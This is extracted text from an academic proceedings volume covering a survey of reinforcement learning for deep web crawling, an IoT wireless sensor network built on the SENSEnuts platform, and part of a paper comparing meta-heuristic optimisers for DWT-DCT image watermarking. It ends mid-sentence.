3, the selection is based on a full text read. The final count of research paper is 31.
This collection has 16 journal papers, 11 conference papers, and 4 book chapters.
Publishers of the above said collection are Springer, IEEE, ACM, Elsevier, Wiley,
etc.
The contributions of this research paper can be summarized as follows:
• To the best of our knowledge, it is the first survey paper that explores the research
papers of RL in the context of DWC.
• A comparative analysis of the various research papers has been done to explore
their functionality, dataset, metrics, and research gaps.
• A discussion on various open challenges of DWC and how RL can help to solve
these challenges.
The focus of the paper is to organize the various research papers related to RL
in the context of DWC. The rest of the paper is structured as follows: Section 2
presents the background details related to DWC and RL. Section 3 discusses RL-
based research papers pertaining to DWC. Section 4 shows the discussion on various
RL-based techniques and their comparative analysis. Finally, Section 5 summarizes
the conclusion and its future directions.
2 Background
This section describes the basic terms needed to understand the deep web. There are
various types of forms such as search form, query form, login form, subscription
form, polling form, and registration form in deep web. Such forms are categorized
into two parts. The first is the searchable forms, and the second is the non-searchable
forms. Search form and query form come under the category of searchable forms,
and the rest of all types of forms comes under the non-searchable forms. Deep web
content can be accessed only through the searchable form. Finding the searchable
form, from other types of forms is a challenging task. The search form consists of
form labels, text boxes, drop-down lists, buttons, etc. Extraction of labels and their
semantics is the necessary steps to model the forms. Finding the searchable form and
form modeling are the two steps that come under the pre-query category [6]. After
form modeling, query selection is required for filling the search form. A labeled value
set table was proposed by Raghavan et al. to fill the search form [12]. This table has
key-value pairs that generate the query. A query is filled in the search form to submit
the form and retrieve the content automatically. The crawler needs to traverse the
path to retrieve the desired information.
294 K. Madan and R. Bhatia
RL is a type of machine learning that learns the optimal policy through the interaction
of the agent with environment [13]. The optimal policy is the guideline that helps to
select an appropriate action corresponding to a given state. The environment gives
a response based on the appropriate action. This response can either be a reward or
a penalty. It is always desirable to have a reward rather than a penalty. RL uses the
complete framework of the Markov decision process (MDP). MDP has four tuples (S,
A, P, R), whereas ‘S’ is the set of states, ‘A’ is the set of actions, ‘P’ is the probability
of reaching next state based on the given action, and ‘R’ is the immediate reward
produced by environment from a current state to next state. RL maps all entities
such as agent, environment, actions, states, reward function, objective function, and
transition function corresponding to the DWC problem. Q-learning and learning
automata are the types of RL algorithms used in the deep web [3, 3]. Designing the
reward function is a very challenging task. A minor change in the reward function
has a great impact on the policy. There are two types of methods to design the
reward function. First, the manual numeric method is based on domain knowledge.
Second is direct learning from the knowledge of experts using some techniques
like the preference-based RL technique. The preference-based RL technique can be
combined with the DWC domain to design the reward function [15]. Reward function
w.r.t DWC generally considers instant rewards rather than long-term rewards. This
challenge is known as the myopia problem. There are various models to overcome
this challenge, like Q-value-based approximation [3], infinite-horizon discounted
model [14], etc.
3 Review of Literature
Bergman et al. firstly introduced the term deep web, in which dynamic content is
generated by filling the query in search form [1]. Various surveys related to the deep
web were studied to find the number of RL technique-based papers. New research
dimensions can be investigated for the survey paper.
Hernandez et al. proposed a detailed survey of DWC techniques till 2017 [2].
However, this survey covered only two research papers based on the RL technique.
Moraes et al. recommended a systematic literature review based on search form
discovery techniques till mid of 2011 [6]. Only one RL paper based on form crawler
was covered.
Saini et al. have come up with a crawling survey paper in the field of information
retrieval till 2015 [8]. Only one research paper on RL was presented from the focused
crawling domain and missed the RL technique implementation in the deep web
domain.
Reinforcement Learning in Deep Web Crawling: Survey 295
4 Discussion
Thirty-one research papers out of the seventy-seven research papers have been studied
for this survey. No survey paper exists which covers the RL-based technique for
DWC. This is the main motivation behind this survey. This paper reviews the RL-
based techniques that are successfully applied to DWC. Table 1 shows the various
DWC techniques based on RL. Further, its comparative analysis, strength, and future
scope are also mentioned. RL-based techniques such as Q-value-based learning,
learning automata have already been explored in the literature. Various ensemble
approaches, i.e., term frequency–inverse document frequency (TF-IDF), RL with
word2vec, Cascading Style Sheets (CSS) visual properties with RL, and agent coor-
dinator architecture, were also used to traverse the deep web. Kumar et al. proposed
an algorithm based on learning automata to find the deep web pages [14]. This work
with query optimization can be used to crawl the ranked deep web also. Kaelbling
et al. explained the strength and weakness of various models for reward function such
as average reward model, finite horizon, infinite horizon, infinite-horizon discounted
model, normalized discounted cumulative gain, Q-value based approximation [5].
The selection of models also depends on the type of RL techniques. There is much
scope of RL-based techniques for DWC, as discussed in Section 5.
Table 1 (continued)
S. No Strength Dataset Metrics Future scope
8 Patil et al. presented IndiaBix, Telenor Harvest rate, The greedy
the crawler Number of approach can be
architecture to searchable forms improved
explore the search
form using
Q-learning with ε
greedy approach [31]
elements corresponding to the deep web. Form modeling is a tedious task consisting
of label identification and its semantics. It can be implemented with RL-based tech-
niques. Transfer learning can be combined with RL to generate relevant keywords.
These keywords are filled in the search forms, more results are retrieved, and the
environment generates more reward. No work has been done on the sampling strate-
gies for information extraction over the ranked deep web. Transfer learning with
RL can help us to find the high-quality document sample for ranked deep web.
This high-quality document sample leads to achieve the minimum query submission
and maximum coverage. Thus, the environment gives more rewards and leads to
the optimal policy. Query selection of deep web is a challenging task. Finding the
optimal query set is an unsolved problem.
This paper surveys various techniques wherein RL has been successfully applied to
the deep web. Different survey papers have been studied to explore the research gaps
existing in the literature. RL-based techniques in the domain of DWC are still in their
infancy stage. Thus, RL-based techniques have immense potential for research in the
field of DWC. Comparative analysis of various techniques with their future scope has
been revealed. Some of the RL-based techniques have not been applied to DWC yet.
Researchers can explore such techniques, i.e., Deep Deterministic Policy Gradient,
Reinforce, Monte Carlo Policy Gradient, Reinforce with baseline, and Deep RL
techniques such as Deep Q-Network, Actor-critic based learning. These techniques
can help to solve the challenges of DWC. Designing the reward function is a crucial
part of RL. Various techniques, i.e., imitation learning, replay buffer, preference-
based RL, inverse RL, etc., can be used to define the reward function. The imitation
learning or inverse RL technique may help to design the reward function when a
reward function definition is not available.
Reinforcement Learning in Deep Web Crawling: Survey 299
References
1. Bergman, M. K. (2001). White paper: The deep web: Surfacing hidden value. Journal of
Electronic Publishing, 7(1).
2. Hernández, I., Rivero, C. R., & Ruiz, D. (2019). Deep web crawling: A survey. World Wide
Web, 22(4), 1577–1610.
3. Zheng, Q., Wu, Z., Cheng, X., Jiang, L., & Liu, J. (2013). Learning to crawl deep web.
Information Systems, 38(6), 801–819.
4. Mishra, A., Mattmann, C. A., Ramirez, P. M., & Burke, W. M. (2018). ROACH : Online
apprentice critic focused crawling via CSS cues and reinforcement. In Proceedings of ACM
Conference on Knowledge Discovery and Data Mining (KDDD 2018), August (pp. 1–9).
5. Leslie Pack Kaelbling, A. W. M., & Littman, M. L. (1996). Reinforcement learning: A survey.
Journal of Artificial Intelligence Research, 708–713.
6. Moraes, M. C., Heuser, C. A., Moreira, V. P., & Barbosa, D. (2013). Prequery discovery
of domain-specific query forms: A survey. IEEE Transactions on Knowledge and Data
Engineering, 25(8), 1830–1848.
7. Kantorski, G. Z., Moreira, V. P., & Heuser, C. A. (2015). Automatic filling of hidden web
forms. ACM SIGMOD Record, 44(1), 24–35.
8. Saini, C., & Arora, V. (2016). Information retrieval in web crawling: A survey. In 2016 Inter-
national Conference on Advances in Computing, Communications and Informatics (ICACCI)
(pp. 2635–2643).
9. Kumar, M., Bhatia, R., & Rattan, D. (2017). A survey of web crawlers for information retrieval.
WIREs Data Mining Knowledge Discovery, 7(6), e1218.
10. Li, S., Chen, C., Luo, K., & Song, B. (2019). Review of deep web data extraction. In 2019
IEEE Symposium Series on Computational Intelligence (SSCI) (pp. 1068–1070).
11. Google Scholar. 2020. [Online]. Available http://scholar.google.com/. Accessed 30 December
2020.
12. Raghavan, S., & Garcia-Molina, H. (2001). Crawling the hidden web. In 27th VLDB
Conference—Roma, Italy (pp. 1–10).
13. Sutton, R. S., & Barto, A. G. (1998). Reinforcement learning: An introduction.
14. Kumar, M., & Bhatia, R. (2018). Hidden webpages detection using distributed learning
automata. Journal of Web Engineering, 17(3–4), 270–283.
15. Wirth, C., Akrour, R., Neumann, G., & Fürnkranz, J. (2017). A survey of preference-based
reinforcement learning methods. Journal of Machine Learning Research, 2, 30–34.
16. Shah, S., Patel, S., & Nair, P. S. (2014). Focused and deep web crawling—A review.
International Journal of Computer Science and Information Technologies, 5(6), 7488–7492.
17. Akilandeswari, J., & Gopalan, N. P. (2007). A novel design of hidden web crawler using
reinforcement learning based agents. In Advanced parallel processing technologies (Vol. 4847,
pp. 433–440). Springer.
18. Marin-Castro, H. M., Sosa-Sosa, V. J., Martinez-Trinidad, J. F., & Lopez-Arevalo, I. (2013).
Automatic discovery of web query Interfaces using machine learning techniques. Journal of
Intelligent Information System, 40(1), 85–108.
19. Chakrabarti, S., Punera, K., & Subramanyam, M. (2002). Accelerated focused crawling through
online relevance feedback. In Proceedings of 11th International Conference on World Wide
Web, WWW’02 (pp. 148–159).
20. Sharma, D. K., & Sharma, A. K. (2011). A QIIIEP based domain specific hidden web crawler. In
Proceedings of the International Conference & Workshop on Emerging Trends in Technology—
ICWET ’11 (pp. 224–227).
21. Singh, L., & Sharma, D. K. (2013). An approach for accessing data from hidden web using
intelligent agent technology. In 2013 3rd IEEE International Advance Computing Conference
(IACC) (pp. 800–805).
22. Alzubi, O. A., Alzubi, J. A., Ramachandran, M., & Al-shami, S. (2020). An optimal
pruning algorithm of classifier ensembles: Dynamic programming approach. Neural Computer
Applications, 6.
300 K. Madan and R. Bhatia
23. Zhang, Z., Du, J., & Wang, L. (2013). Formal concept analysis approach for data extraction
from a limited deep web database. Journal of Intelligent Information System, 41(2), 211–234.
24. Pavai, G., & Geetha, T. V. (2017). Improving the freshness of the search engines by a
probabilistic approach based incremental crawler. Information Systems Frontiers, 19(5),
1013–1028.
25. Pratiba, D., Shobha, G., Lalithkumar, H., & Samrudh, J. (2017). Distributed web crawlers using
hadoop. International Journal of Applied Engineering Research, 12(24), 15187–15195.
26. Ahmed Md. Tanvir, M. C. (2019). Design and implementation of web crawler utilizing
unstructured data. Journal of Korea Multimedia Society, 22(3), 374–385.
27. Gupta, D., Rodrigues, J. J. P. C., Sundaram, S., Khanna, A., Korotaev, V., & De Albuquerque,
V. H. C. (2018). Usability feature extraction using modified crow search algorithm: A novel
approach. Neural Computer Application, 6.
28. Murali, R. (2018). An intelligent web spider for online e-commerce data extraction. In 2018
Second International Conference on Green Computing and Internet of Things (ICGCIoT)
(pp. 332–339).
29. Tahseen, I., & Salim, D. (2018). A proposal of deep web crawling system by using breath-first
approach. Iraqi Journal of Information and Communications Technology, 48–61.
30. Tanvir, A. M., Kim, Y., & Chung, M. (2019). Design and implementation of an efficient web
crawling using neural network. In Advances in computer science and ubiquitous computing
(pp. 116–122). Springer.
31. Patil, Y., & Patil, S. (2016). Implementation of enhanced web crawler for deep-web interfaces.
International Research Journal of Engineering and Technology, 2088–2092.
Wireless Sensor Network for Various
Hardware Parameters for Orientational
and Smart Sensing Using IoT
Abstract SENSEnuts is a very advanced type of platform that gives very user-
friendly features like API that are easy to use, user modified source code, and GUI
and helps us in real-time analysis of the sensor data. Also another advantage of using
SENSEnuts is the connection of wireless devices at a very low rate and low-power
consumption. The data sensed from the sensor nodes is transferred to the Internet
through sensenodes Wi-Fi module. The data is usually stored in the cloud from where
we can easily analyze and monitor the sensed raw data. Using SENSEnuts package
of hardware such as GAP, HTP, TL sensor packages used in this paper, we can
monitor and overcome the conventional difficulties of hardware implementation,
design, and software rectification for conventional orientational sensor hardware
using accelerometer for analyzing different planes and motion of sensing and also its
usage in for humidity, pressure temperature sensing without any hassle free hardware
implementations that can be used in smart agricultural and for smart home systems.
This work carried out proves to be cost effective with high accuracy and precision
overcoming conventional hardware implementations with live updation from sensor
nodes to senslive GUI for accurate and precise detection and usage.
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 301
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_25
302 M. D. Gazi et al.
1 Introduction
Internet of Things (IoT), the general term used in new era of communication, points
to cases where connectivity between networks and the computational complexity
is extended toward sensors nodes and actuators allowing data-driven exchange of
information without any external intervention. In IoT, any node is connected to
the network is termed as smart as it consists of inbuilt intelligence that helps it to
perform the different kinds of tasks by itself. Wireless sensor network (WSN) has
an added advantage over other networks due to its remote location sensing where
monitoring of data is not possible. IoT has attracted numerous attentions in wide
range of applications. The major concern in today’s world is time and accuracy that
means many applications throughout the world need continuous attention, e.g., the
temperature of the boiler room needs to be continuously monitored, and an alarm
should be raised if the temperature goes out of margin line. For such purposes,
SENSEnuts is one of the best platforms that enables us to continuously gather real-
time data through sensor nodes in a way better accurate manner. However, in order
to store the data and to do post analysis of data coming from sensor nodes for further
applications, the data needs to be stored in a cloud.
This work is based on a wireless communication of sensor networks and combi-
nation of real-time data to IoT. In [1], the authors proposed a triaxial accelerometer-
based human detection using perceptron algorithmic theory and also by using neural
coding models, and this model requires extensive neural algorithm coding for three
plane position sensing that can be done very hassle free using SENSEnuts GAP sensor
package and by its respective GUIs in the proposed work. Khan et al. proposed a
triaxial accelerometer-based activity sensing using augmented feature and a hierar-
chical recognizer [2]. In [3], the authors proposed a system that is based on web-based
sewage monitoring system using a set of hardware containing the TL sensor. Jestrada-
Lopez et al. proposed smart soil parameters estimation system using an autonomous
wireless sensor networks with dynamic power strategy [4]. In this work, the soil
parameters that are suitable for growth of crops are chosen by using a deployed
wireless sensor network that consists of nodes and sensors. Work in [5] proposed
energy aware corona level-based routing approach for IEEE 802.15.4-based wire-
less sensor networks. Agarwal et al. explained design and implementation of medium
access control-based routing on real wireless sensor networks testbed [6].
In these above-mentioned works, authors have used sensing technologies like
RFID, PIC, GSM, Raspberry pi, and ZigBee and augmented reality-based coding
for using activity sensing using conventional type accelerometer only [6-8]. By those
type of heavy coded devices, they were able to control, analyzes the temperature,
humidity, and pressure, required for optimal agricultural usage. These papers provide
an idea for using the WSN with SENSEnuts platform for activity sensing, temper-
ature sensing, humidity and pressure sensing for agricultural usage, and other user
applications [8-10]. These papers give us an idea about the deployment of user special
IoT network systems for which the platform known as SENSEnuts is best suitable
Wireless Sensor Network for Various Hardware Parameters … 303
for its node to node communication, its robustness, and easily available GUI [10-14].
This platform is also very economical and can be used for research purposes [14-17].
In this section, the basic WSN system architecture using SENSEnuts platform used
for this work is described. The easily usable graphical user interfaces in SENSEnuts
makes it in demand for industrial and research purposes. The WSN system architec-
ture can also be seen in Fig. 1 which gives us an accurate top to bottom hierarchy
how the different sensor nodes are connected to each other, giving us highly precise,
user-friendly with its auto updating GUIs. WSN being a modular type of design gives
a seamlessly integrated performance with fast node to node communication system.
Also being a modular type of design system makes it easy to install and also its faster
deployment. The WSN architecture can be easily understood from Table 1.
The proposed sensor module design structure in this work is shown in Fig. 1. The
lower most part consists of a 5 V battery. Above the battery, consists of a radio
module. The radio module contains a PCB antenna and a microcontroller used in it.
Above the radio modules, there are the sensor nodes attached. Also there exists USB
gateway module, also known as extender module that is usually attached on the top.
Specifications for each module (shown in Fig. 2) used are also given.
Extender: It is used to extend the microcontroller to other sensor devices. It also
debugs hardware and access SPI, UART, ADC, I2C protocols in it.
Radio module: The microcontroller used here is JN5168. It is used for wireless
transmission of real-time data. It consists of 802.15.4 IEE standard with its low-power
consumption type of 32 bit RISC controller consisting a clock size of 32 MHz with
a RAM of 32 and 256 kb flash memory and 4 kb EEPROM. The security in this type
of module is of the type of AES with receiving current of 17 mA and transmitting
current of 15 mA and transmission power that is of controllable in nature ranges
from −31 to +2.5 dBm.
Light and temperature sensor: The temperature sensing capability of this sensor
is from −24 to 80 °C degree with resolution of 12 bit. The light sensing capability is
measured in LUX, i.e., from 3 to 63 k LUX with a resolution of 16-bit with excellent
IR, UV rejection with 1.5 uA shutdown current.
Temperature pressure and humidity sensor: The sensors used here for measuring
humidity and pressure measure the relative humidity and pressure with a resolution
of 14 and 24-bit, respectively, with 0.04% RH.
304 M. D. Gazi et al.
Soil moisture sensor: This type of sensor measures the moisture in soil by
measuring the change in equivalent resistance between the two nodes of sensor
probes.
GAP sensor: It is used for overall motion and positioning detection purposes. It
consists of GPS, a transceiver, accelerometer, PIR sensor, and an antenna with 14-bit,
8-bit digital output, and also consists of 2g, 4g, 8g dynamically selectable full scale
with a built in PIR with extremely low current consumption.
Wireless Sensor Network for Various Hardware Parameters … 305
Wi-Fi gateway system: It uses SPI interface system. The band coverage here is
with 2.4 GHz and 802.11/b/g/n Wi-Fi standard. It consists of a serial flash system
with Broadcom BCM43362 single band that includes Wi-Fi security modes like:
306 M. D. Gazi et al.
Open, WEP, WPA, WPA2-PSK with 1 MB flash memory and 128 kb SRAM with
Wi-Fi power save of 0.77 mA.
3.1 Overview
Figure 3 shows how quickly the sensor data is sent to the senselive network and
mentions all the connected devices used in the network such as sensor nodes, pan
coordinator, Wi-Fi module. Also there exists a different mac ids for different sensor
nodes. It also consists of gateway module for its connectivity for its overall IoT
setup. The SENSEnuts platform works on 802.15.4 IEEE standard that works on
user efficient parameters such as low bandwidth, low battery usage, and maximum
range of communication. Further the data coming from the sensor nodes is carried
through the network to the senselive user interface where it is stored and analyzed
for future applications (Fig. 9).
The fundamental unit used here consists of the sensor nodes or modules that are
part of SENSEnuts platform that includes GAP sensor, TL sensor, and HTP sensor.
An external battery powered radio module is installed below the two sensor nodes
consisting of a coordinator setup in the middle of two sensor nodes. PAN coordinator
is also installed, as it has a radio module and a Wi-Fi module attached to it for
transmission and reception purposes. The PAN coordinator gets associated with the
coordinator and gets all the information carried forward to the PAN coordinator,
and then the information is forwarded to Wi-Fi module for its wireless transmission.
The functionality of PAN coordinator and coordinator is different, but there exist
a same hardware setup for both PAN coordinator and coordinator. The functional
differentiability exists whether the node is programmed for a PAN coordinator or
coordinator. The requirement of programming these modules are the drivers are
installed after the gateway module of the SENSEnuts platform is plugged in. The bin
file is generated that is to be flashed into the device after the code is built, compiled,
and made into the hex file. After that the GUI on SENSEnuts should be opened, whose
work is to display the raw data coming from the sensor nodes upon programming
the particular sensor node the both the PAN coordinator and coordinator are well
connected. Once both are associated with each other than the coordinator starts
sending the raw data wirelessly between PAN coordinator and coordinator and we
can easily see the live readings from our sensor nodes which that particular sensor is
designed and also usual checking of the MAC address for the attached sensor nodes
is checked in the beginning of the setup connection.
The specifications of hardware and software used are.
The data coming from the real-time sensor nodes can be verified in the senselive.
This data gets updated on real-time basis on the senselive platform. Different sets are
made according to their parameters and usability such as GAP sensor, HTP sensor,
TL sensor, and the data coming from these sensors get continuously updated on
the senselive platform. GAP sensor output is given in Figs. 4, 5, 6, 7, and 8, while
that of HTP and TL sensors can be similarly given by using senslive GUI interface,
respectively. The changes in position, temperature, light, humidity, and pressure can
be seen in the senselive platform which are shown in Figs. 4, 5, 6, 7, and 8.
In Figs. 4, 5, 6, 7, and 8, this data is shown on senselive GUI of the GAP sensor
node. The GAP sensor node gives us live reading coming from the actual connected
node and can be used to sense real-time reading that could be helpful in detecting
object acceleration in x, y, z plane. The movement of this GAP sensor gives us the
308 M. D. Gazi et al.
change in the real-time readings in three planes of movement of object which helps
us in detecting the plane of motion of the object also. The usage of this SENSEnuts
GAP sensor not only is beneficial over conventional triaxial type of accelerometers
for detection and motion of moving object in on three axis planes that requires a lot of
augmented and neural network-based designing and coding for its live updation that is
shown in this proposed work using GAP sensor using senselive GUI, but also proves
to be cost efficient, less power consuming, and real-time updating of reading on the
open-source cloud. The usage of this GAP sensor from this SENSEnuts package
could be used in real-time updation services in defense technology for real-time
310 M. D. Gazi et al.
updation and monitoring. Similarly, the data can be given on senselive GUI for the
TL sensor that gives us the real-time updation of the temperature and light using
this senselive package. In this way, the TL sensor data can help the user for regular
climatic updation for any agricultural usage and purpose. The data coming from
the TL sensor node also get updated on the real-time GUI interface of SENSEnuts
makes it user-friendly, low power consuming application, and its real-time updation.
Similarly, we can notice the change in real-time updation of the reading coming from
the HTP sensor node that are also updated on the real time on the senselive GUI for
its analysis and usage (Figs. 10, 11, 12, 13 and 14).
4.2 Monitoring
The real-time sensor nodes are connected to the coordinators that are essential part
for the monitoring process. The GAP sensor node gets us the values of change in
orientational acceleration and positioning that could be used for sensing of real-
time activity. Similarly the TL sensor nodes give us the real-time node readings for
temperature and light sensing that eventually could prove beneficial for smart home
system technology for live updating and reading from TL sensor node to the user
system interface. Another important part of this SENSEnuts platform consists of
the radiomodule that is used to send data to the coordinator (PAN). Then this PAN
Wireless Sensor Network for Various Hardware Parameters … 311
coordinator with the help of Wi-Fi module can help us to display the live readings
from the real-time sensor to the senselive GUI. In this way, this method is cost
effective, uses less power, and proves to be helpful in remote monitoring.
312 M. D. Gazi et al.
5 Conclusion
In this work, we have used the concept of connecting the sensor world to the IoT
with hassle free concept and with high precision and accuracy using wireless sensor
network (WSN). The data coming from the real-time sensors can be easily sensed
and used for future applications. The proposed work proved to be hassle free in
comparison to the conventional triaxial accelerometeric three plane detection system
Wireless Sensor Network for Various Hardware Parameters … 313
with a lot less computational complexity, no neural network modeling, easy live
updation on senslive GUI and easy forwarding to the cloud for further usage. A
small change in temperature, acceleration, luminosity, humidity, and pressure were
detected with a small or less delay that is on the cloud end at the time of updating the
real-time data from the sensor nodes to the senslive GUI. In this way, wireless sensor
network with its usage using sensnuts hardware package and its GUIs proves to be
very user-friendly, cost effective, low power consuming and gives us the edge over
the conventional hardware implanting technologies whether in the field of detecting
object acceleration or motion or in smart home systems for detecting and monitoring
of light, temperature for user-friendly system applications. In future, we can improve
the limited range by using multi-hop type of communication system and by using
suitable routing protocols available so that the data packet can reach easily to the
destination and can also send this real-time senslive GUI data to any cloud service
for its usage over Internet from very distant places.
References
1. Jalal, A., Majid, A. K. Q., & Sidduqi., M. A. A triaxial based human motion detection for
ambient smart home systems. In IBCAST. https://doi.org/10.1109/IBCAST.2019.8667183.
2. Khan, A. M., Lee, Y. K., Lee, S. Y., & Kim, T. S. (2010). A triaxial accelerometer-based
physical-activity recognition via augmented-signal features and a hierarchical recognizer. IEEE
Transactions on Information Technology in Biomedicine, 14(5), 1166–1172. https://doi.org/10.
1109/titb.2010.2051955
3. Haswani, N. G., & Deore, P. J. (2018). Web-based realtime underground drainage or sewage
monitoring system using wireless sensor networks. In 2018 Fourth International Conference
on Computing Communication Control and Automation (ICCUBEA) (pp. 1–5)
314 M. D. Gazi et al.
1 Introduction
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 315
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_26
316 P. Garg and R. Rama Kishore
which can be used for authentication purpose. A watermark can be visible to end-
users like, while creating a video using any application that application adds its logo
over that video. But these visible watermarks can be deleted quickly by using Photo-
shop, and these also decreased the quality of the content. Most people use invisible
watermarks so that these can’t be visible to anyone and still serve their purpose. The
basic phenomenon of watermarking is to add an image, text, logo, or information to
cover data to provide intellectual property rights to that content. This logo can be
extracted when required to fulfill the task [1]. While adding a watermark to the cover
content, the original image’s quality should not degrade, and it should be recoverable
after various attacks applied over the content [2, 3].
There are various watermarking applications like copyright protection, broadcast
monitoring, fingerprinting, and medical applications [4-7], which attract researchers
to work in this field. Now a day’s watermarking is being used in medical fields
to protect the confidential information of patients. Watermarking can be performed
in spatial domain [8-10] or in frequency domain [11-14]. But now a day’s mostly
frequency-domain techniques are being used as these provide better robustness to the
watermark added to the image. To provide a good balance between imperceptibility
and robustness, a combination of frequency-domain techniques like DFT and DCT
based [15], DFT, DWT, SVD [16], and DWT, DCT [17] are being used. The quality
of the watermarking scheme (known as imperceptions) is measured by calculating its
PSNR value [18] and MSE, while its robustness against various attacks is measured
using normalized correlation (NC) [19] and bit error rate (BER). It is very hard for
an algorithm to maintain the original image’s quality, while providing good behavior
against various attacks. So an optimization procedure is required to achieve this
objective, one of the techniques to perform optimization is called nature-inspired
optimization. As the name suggests, these algorithms are inspired by the natural
behavior of the spices available in the nature like honey bees, ants, cuckoos, bat, etc.
Many nature-inspired algorithms have been used in the watermarking field [20-24]
to optimize the scheme to find the balance and maintain the quality of the image.
This paper aims to study and analyze these meta-heuristics algorithms’ behavior
in the watermarking procedure. For this purpose, a watermark has been added to the
cover image using a hybrid scheme in the frequency domain with 1-Level DWT and
DCT schemes. It is then optimized using three different meta-heuristic algorithms
called firefly, artificial bee colony, and particle swarm optimization algorithms. Here,
these algorithms are used to find the strength factor used in the watermarking embed-
ding procedure, which is crucial in providing the tradeoff between quality and robust-
ness. The proposed scheme is a blind technique that does not require the original
image or watermark at the time of its extraction, making it more secure.
The rest of the paper is divided into various sections like Sect. 2 describes various
works done in the field of optimization of the watermarking procedure. Section 3
describes the proposed embedding and extraction algorithm. All the experimental
results and comparative analysis is discussed in Sects. 4 and 5 show the compara-
tive analysis. Section 6 concludes the proposed work and shows some of its future
directions.
Comparative Analysis: Role of Meta-Heuristic Algorithms … 317
2 Related Work
3 Proposed Technique
The proposed scheme is a blind watermarking technique that provides the robust-
ness, imperceptibility, and security characteristics of the digital watermarking. In
this paper, a grayscale image of size 512*512 is taken as an input or cover image on
which the watermark logo is embedded by using the DWT technique. DWT converts
an image into hierarchies of information, both spatial domain as well as frequency
domain [36]. Firstly, DWT is applied to the cover image, and then, it is performed
again on the LL sub-band of size 128*128. Then, LL1 sub-band is chosen to embed
the watermark. The reason for choosing the LL sub-band for embedding is that LL
represents the image’s low resolution. DCT (Discrete Cosine Transform) is applied
on LL1 sub-band; DCT is a linear orthogonal transformation mostly used in digital
image processing [37]. The watermark logo is scrambled using the Arnold trans-
form and then used to embed DCT of the LL1 sub-band to provide security to the
scheme. The proposed scheme is optimized by using many multi-objective func-
tions based meta-heuristic algorithm called PSO, ABC, and Firefly algorithm. The
proposed method is a blind watermarking technique because it requires only the
embedded watermark image at the time of extraction, making it a secure scheme.
Table 1 shows all the initial parameters used in all three optimization algorithms.
Here, standard parameters like population size and iteration numbers are the same
for all three algorithms. The algorithm of watermark embedding and extraction is
shown in Algorithm 4. This section describes the algorithm used for embedding
the watermark in the grayscale image of size 512*512 and its extraction process.
All the experiments are performed on the Lena image as the Cover image, and for
watermarking, a logo image of size 64*64 is used for embedding purposes. Here,
extraction of watermark is done blindly as it only requires the embedded image
and not the original cover or watermark image. Only the key used to encrypt the
watermark is needed to decrypt it after extracting it from the embedded image. The
complete process of watermark extraction and embedding is shown in Fig. 1. Here
during embedding, different scaling factors are used, which is calculated by using
three meta-heuristic techniques.
Algorithm 4: Steps of proposed approach
Comparative Analysis: Role of Meta-Heuristic Algorithms … 319
Embedding:
1. Read the cover image of size m*n and perform 1-Level DWT on the cover image to convert it into 4 different sub-bands of
equal-sized.
[LL1, HL1, LH1, HH1]=DWT(I) m,n
Where LL1, HL1, LH1 and HH1 are 4 sub-bands arranged in increasing order of its frequency and (I) m,n is the original
cover image of size m*n
2. Select the LL1 sub-band of the host image as it has most of the cover image information and convert it into various blocks
of size 4*4.
3. Perform block-wise DCT on every block received in step 2.
4. Read the 64*64 watermark image and scrambled it using Arnold transform technique to provide security to the watermark
image.
5. Convert the scrambled watermark into a vector so that bitwise watermark embedding can be performed on each block of
size 4*4.
6. Choose a location from each block based on its frequency content to embed the watermark. Here watermark bits are em-
bedded by adding or subtracting a watermark strength factor obtained by applying the meta-heuristic algorithms. This val-
ue of the embedding factor is calculated using firefly, PSO, and ABC algorithm and then is used one by one for embedding
the watermark bit. The watermark is embedded by using the following equations:
If SW(i)=1:
bx(i,j)=bx(i,j)-SF;
else if SW(i)=0
bx(i,j)=bx(i,j)+SF;
where, bx(i,j) is the location selected in blocks for embedding and SF is the robustness factor or embedding strength
factor calculated using Artificial Bee Colony Algorithm, firefly algorithm, and Particle Swarm Optimization tech-
niques. The process of computing the embedding factor using these algorithms is described in Section 3. The loca-
tions used for embedding are worked as the key values to be used at the time of extraction of the watermark.
7. Combine each block back to form a block of sized 256*256 and perform Inverse DCT (IDCT) on it to get the image in the
spatial domain
8. Now, the embedded LL1 sub-band is combined with other sub-bands by applying IDWT and get the watermarked image.
Extraction:
1. Read the watermarked image and perform 2-D DWT on it.
[LL1,HL1, LH1, HH1]= DWT(Ewk)
2. Perform block-wise DCT on LL1 sub-band and divide the image into blocks of size 4*4 as shown in embedding algorithm
in step 4.
3. Find the pixel values of each selected block used for embedding and
if pix >=0
wm(i,j)=0;
else if pix < 0
wm(i,j)=1;
Where wm(i,j) is the pixel value of the watermark image at location i, j
4. Combine all the results obtained in Step 4 into a vector. The image received is the scrambled watermark image; now, it is
unscrambled using the key used when embedding it. The received image is the extracted watermark image. Now it is com-
pared with the original image to check its robustness and imperceptibility.
320 P. Garg and R. Rama Kishore
The term perceptual quality means that once the watermark image is embedded into
the original image, it should not be visible to the end-user, and the embedded image
should look like the original image only [38, 39]. There are various measures used
to measure it, like MSE (Mean Square Error), PSNR (Peak Signal to Noise Ration).
PSNR is one of the most useful measures because it gives the statistical difference
between the original cover image and watermarked image [14]. Higher the value
of PSNR, the more invisible the watermark is. Generally, a PSNR value of 27 is
acceptable, which is achieved using the proposed scheme. A PSNR value greater
than 35 is achieved for all the techniques used here, as shown in Table 1, proving
that the proposed scheme is very imperceptible.
Robustness means the watermark image’s capacity to handle the attack, or it is used
to measure the similarity between the original watermark image and the extracted
watermark. There are various measures used to calculate the robustness; one of these
is BER (Bit Error Correction), which calculates the error rate between the original
and extracted watermark image. The most common measure of watermark robustness
is NC (Normalized Correlation) [40], which measures the correlation between the
original and extracted watermark image. The more correlation between these two
images, the more close NC value will be toward 1. In this technique, both NC and
BER values are calculated for all the attacks to measure the scheme’s robustness.
Their NC values are calculated against various attacks as shown in Table 3, and BER
values are shown in Table 4. The NC value greater than 0.9 is achieved for all the
techniques applied for optimization.
5 Comparative Analysis
The results of these optimization techniques are compared with each other in terms
of NC value and the BER values as shown in Figs. 2, 3, 4, and 5. It can be seen that the
results of applying each algorithm are different even though they all are performing
the same task. From all the experiments, we can summarize that the firefly algo-
